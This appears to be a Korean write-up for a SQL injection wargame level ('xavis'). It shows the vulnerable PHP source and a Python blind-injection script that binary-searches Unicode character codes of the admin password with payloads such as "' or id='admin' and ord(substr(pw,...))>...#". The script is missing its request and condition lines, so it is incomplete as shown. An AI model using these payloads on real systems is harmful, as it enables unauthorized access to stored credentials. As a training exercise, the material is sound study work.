<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/regex|like/i', $_GET[pw])) exit("HeHe");
$query = "select id from prob_xavis where id='admin' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_xavis where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("xavis");
highlight_file(__FILE__);
?>pw에 별다른 필터링이 없지만
pw는 유니코드라 ascii값만 구할 때처럼 빨리 구할 수 없음
ascii값은 많아봤자 128개지만 유니코드는 65535개임
이진탐색법을 써서 시간을 단축
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
|
import requests
cookie = {"PHPSESSID": ""}
session = requests.Session()
def findPw(start, end,idx):
uniCode = (start+end)//2
params = {
"pw":"' or id='admin' and ord(substr(pw,{},1))>{}#".format(idx,uniCode)
}
return findPw(uniCode,end,idx)
else:
params = {
"pw":"' or id='admin' and ord(substr(pw,{},1))={}#".format(idx,uniCode)
}
print(chr(uniCode))
return chr(uniCode)
else:
return findPw(start,uniCode,idx)
pw = ""
for i in range(1,4):
pw += findPw(0,100000,i)
print(pw)
|
